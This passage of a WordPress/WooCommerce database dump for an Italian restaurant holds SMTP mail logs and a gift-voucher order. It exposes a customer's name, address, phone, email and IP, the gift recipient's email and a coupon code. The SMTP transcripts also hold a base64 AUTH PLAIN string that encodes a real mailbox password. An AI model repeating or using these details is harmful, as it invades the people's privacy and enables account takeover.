'),(21776,1127,'is_vat_exempt','no'),(21777,1128,'solution','All good, mail sent.'),(21778,1128,'success','1'),(21779,1128,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(21780,1128,'to_header','webmaster@baldisserri.com'),(21781,1128,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21782,1128,'original_to','webmaster@baldisserri.com'),(21783,1128,'original_subject','[Sol Y Mar, ristorante a Riccione] Alcuni plugin sono stati aggiornati automaticamente'),(21784,1128,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Smash Balloon Instagram Feed versione 2.5.2\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(21785,1128,'original_headers',''),(21786,1128,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sat, 24 Oct 2020 08:27:04 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <198204c8548bcc1b2fa2610c9d68a56e@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Sat, 24 Oct 2020 12:27:03 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it sono s=\r\ntati aggiornati automaticamente all\'ultima versione. Non =C3=A8 richiest=\r\na da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin ora sono a=\r\nggiornati all\'ultima versione:=0A- Smash Balloon Instagram Feed versione=\r\n 2.5.2=0A=0A=0ASe hai problemi di qualsiasi tipo o hai bisogno di aiuto,=\r\n i volontari dei forum di supporto su https://it.wordpress.org/forums/ p=\r\nossono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/support/forums/=\r\n=0A=0AIl team di WordPress\r\n.\r\n250 OK id=1kWIdU-0004Fr-2O\r\n'),(21789,1141,'_order_key','wc_order_0GIIvrxRVihTY'),(21790,1141,'_customer_user','0'),(21791,1141,'_payment_method','paypal'),(21792,1141,'_payment_method_title','PayPal'),(21793,1141,'_customer_ip_address','79.32.22.213'),(21794,1141,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Safari/605.1.15'),(21795,1141,'_created_via','checkout'),(21796,1141,'_cart_hash','6a420dfebb4c7b56219fced7382b4386'),(21797,1141,'_billing_first_name','Marcello'),(21798,1141,'_billing_last_name','Manduchi'),(21799,1141,'_billing_address_1','Torricelli 14'),(21800,1141,'_billing_city','San Mauro Pascoli'),(21801,1141,'_billing_state','FC'),(21802,1141,'_billing_postcode','47030'),(21803,1141,'_billing_country','IT'),(21804,1141,'_billing_email','marcello.manduchi@hotmail.it'),(21805,1141,'_billing_phone','3204217844'),(21806,1141,'_order_currency','EUR'),(21807,1141,'_cart_discount','0'),(21808,1141,'_cart_discount_tax','0'),(21809,1141,'_order_shipping','0.00'),(21810,1141,'_order_shipping_tax','0'),(21811,1141,'_order_tax','0'),(21812,1141,'_order_total','100.00'),(21813,1141,'_order_version','4.6.1'),(21814,1141,'_prices_include_tax','no'),(21815,1141,'_billing_address_index','Marcello Manduchi  Torricelli 14  San Mauro Pascoli FC 47030 IT marcello.manduchi@hotmail.it 3204217844'),(21816,1141,'_shipping_address_index','        '),(21817,1141,'is_vat_exempt','no'),(21818,1141,'Payment type','instant'),(21819,1141,'_transaction_id','9KS77398KB716031D'),(21820,1141,'_paypal_status','completed'),(21821,1141,'PayPal Transaction Fee','3.75'),(21822,1141,'_date_paid','1603656074'),(21823,1141,'_paid_date','2020-10-25 21:01:14'),(21824,1141,'_download_permissions_granted','yes'),(21825,1141,'_recorded_sales','yes'),(21826,1141,'_recorded_coupon_usage_counts','yes'),(21827,1141,'_order_stock_reduced','yes'),(21828,1142,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(21829,1142,'success',''),(21830,1142,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(21831,1142,'to_header','notifiche@ristorantesolymar.it'),(21832,1142,'reply_to_header','Marcello Manduchi <marcello.manduchi@hotmail.it>'),(21833,1142,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21834,1142,'original_to','notifiche@ristorantesolymar.it'),(21835,1142,'original_subject','[Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1141) - 25 Ottobre 2020'),(21836,1142,'original_message','<!DOCTYPE html>\n<html lang=\"it-IT\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hai ricevuto il seguente ordine da Marcello Manduchi:</p>\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=1141&amp;action=edit\" style=\"font-weight: normal; text-decoration: underline; color: #557da1;\">[Ordine #1141]</a> (25 Ottobre 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prodotto</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantità</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prezzo</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta) (#coupon)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To Name:</strong> <p style=\"margin: 0;\">Filippo Saulle</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\"><a href=\"mailto:Filos4@libero.it\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">Filos4@libero.it</a></p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Amalia e Riccardo Manduchi</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Metodo di pagamento:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Totale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Indirizzo di fatturazione</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Marcello Manduchi<br>Torricelli 14<br>47030<br>San Mauro Pascoli<br>FORLÌ-CESENA									<br><a href=\"tel:3204217844\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3204217844</a>													<br>marcello.manduchi@hotmail.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Congratulazioni per la vendita.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(21837,1142,'original_headers','Content-Type: text/html\r\nReply-to: Marcello Manduchi <marcello.manduchi@hotmail.it>\r\n'),(21838,1142,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sun, 25 Oct 2020 16:01:15 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n535 Incorrect authentication data\r\n'),(21839,1143,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(21840,1143,'success',''),(21841,1143,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(21842,1143,'to_header','marcello.manduchi@hotmail.it'),(21843,1143,'reply_to_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(21844,1143,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21845,1143,'original_to','marcello.manduchi@hotmail.it'),(21846,1143,'original_subject','Il tuo ordine su Sol Y Mar, ristorante a Riccione è stato ricevuto!'),(21847,1143,'original_message','<!DOCTYPE html>\n<html lang=\"it-IT\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Grazie per il tuo ordine</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Ciao Marcello,</p>\n<p style=\"margin: 0 0 16px;\">Ti informiamo che abbiamo ricevuto il tuo ordine #1141 ed è in fase di elaborazione.</p>\n\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	[Ordine #1141] (25 Ottobre 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prodotto</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantità</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prezzo</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To Name:</strong> <p style=\"margin: 0;\">Filippo Saulle</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\"><a href=\"mailto:Filos4@libero.it\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">Filos4@libero.it</a></p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Amalia e Riccardo Manduchi</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n			<tr>\n			<td colspan=\"3\" style=\"padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n				<p style=\"margin: 0 0 16px;\">Validità 6 mesi dal momento dell\'acquisto</p>\n			</td>\n		</tr>\n		\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Metodo di pagamento:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Totale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Indirizzo di fatturazione</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Marcello Manduchi<br>Torricelli 14<br>47030<br>San Mauro Pascoli<br>FORLÌ-CESENA									<br><a href=\"tel:3204217844\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3204217844</a>													<br>marcello.manduchi@hotmail.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Grazie per aver usato www.ristorantesolymar.it.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(21848,1143,'original_headers','Content-Type: text/html\r\nReply-to: Sol Y Mar, ristorante a Riccione <notifiche@ristorantesolymar.it>\r\n'),(21849,1143,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sun, 25 Oct 2020 16:01:17 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n535 Incorrect authentication data\r\n'),(21850,1144,'discount_type','fixed_cart'),(21851,1144,'coupon_amount','100'),(21852,1144,'individual_use','no'),(21853,1144,'usage_limit','1'),(21854,1144,'usage_limit_per_user','0'),(21855,1144,'limit_usage_to_x_items',NULL),(21856,1144,'usage_count','0'),(21857,1144,'date_expires','1619136000'),(21858,1144,'free_shipping','yes'),(21859,1144,'exclude_sale_items','no'),(21860,1144,'apply_before_tax','no'),(21861,1144,'minimum_amount',''),(21862,1144,'maximum_amount',''),(21863,1144,'exclude_product_ids',''),(21864,1144,'exclude_product_categories',''),(21865,1144,'product_ids',''),(21866,1144,'product_categories','a:0:{}'),(21867,1144,'mwb_wgm_giftcard_coupon','1141'),(21868,1144,'mwb_wgm_giftcard_coupon_unique','online'),(21869,1144,'mwb_wgm_giftcard_coupon_product_id','548'),(21870,1144,'mwb_wgm_giftcard_coupon_mail_to','Filos4@libero.it'),(21871,1141,'1141#381','a:1:{i:0;s:18:\"solymarcouponB4WIL\";}'),(21872,1145,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(21873,1145,'success',''),(21874,1145,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(21875,1145,'to_header','Filos4@libero.it'),(21876,1145,'bcc_header','marcello.manduchi@hotmail.it'),(21877,1145,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21878,1145,'original_to','Filos4@libero.it'),(21879,1145,'original_subject','Sol Y Mar, ristorante a Riccione'),(21880,1145,'original_message','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\">\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto; background-color: #ff9898; border-spacing: 10px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 